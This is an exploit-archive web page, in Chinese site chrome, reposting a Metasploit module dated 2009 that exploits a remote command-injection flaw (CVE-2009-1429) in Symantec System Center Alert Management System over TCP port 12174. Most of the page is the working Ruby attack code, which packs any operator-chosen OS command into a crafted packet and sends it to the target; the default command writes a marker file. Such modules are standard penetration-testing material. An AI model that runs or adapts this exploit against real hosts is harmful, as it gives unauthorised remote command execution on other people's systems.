首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Symantec System Center Alert Management System Arbitrary Command Execution(MSF)
来源:http://www.metasploit.com 作者:MC 发布时间:2009-12-07  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Symantec System Center Alert Management System Arbitrary Command Execution',
			'Description'    => %q{
					Symantec System Center Alert Management System is prone to a remote command-injection vulnerability
					because the application fails to properly sanitize user-supplied input.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision:
, 'References' => [ [ 'CVE', 'CVE-2009-1429' ], [ 'BID', '34671' ], ], 'DisclosureDate' => 'Apr 28 2009')) register_options( [ Opt::RPORT(12174), OptString.new('CMD', [ false, 'The OS command to execute', 'cmd /c echo metasploit > %SYSTEMDRIVE%\metasploit.txt']), ], self.class) end def run begin connect len = 12 + datastore['CMD'].length data = [0x00000000].pack('V') data << len.chr data << "\x00" data << datastore['CMD'] data << " -123456789" data << "\x00" print_status("Sending command: #{datastore['CMD']}") sock.put(data) res = sock.get_once if (!res) print_error("Did not recieve data. Failed?") else print_status("Got data, execution successful!") end disconnect rescue ::Exception print_error("Error: #{$!.class} #{$!}") end end end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·IDEAL Administration 2009 v9.7
· Help Workshop 4.74 (hhp Proje
·Polipo 1.0.4 Remote Memory Cor
·VLC Media Player 1.0.3 smb://
·gAlan 0.2.1 Buffer Overflow 0d
·VLC Media Player <= 1.0.3 RTSP
·Adobe Illustrator CS4 v14.0.0
·IDEAL Administration 2009 Buff
·Adobe Illustrator CS4 v14.0.0
·HTML Help Workshop 4.74 (hhp)
·gAlan (.galan file) Universal
·Audacity 1.2.6 (gro File) Buff
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved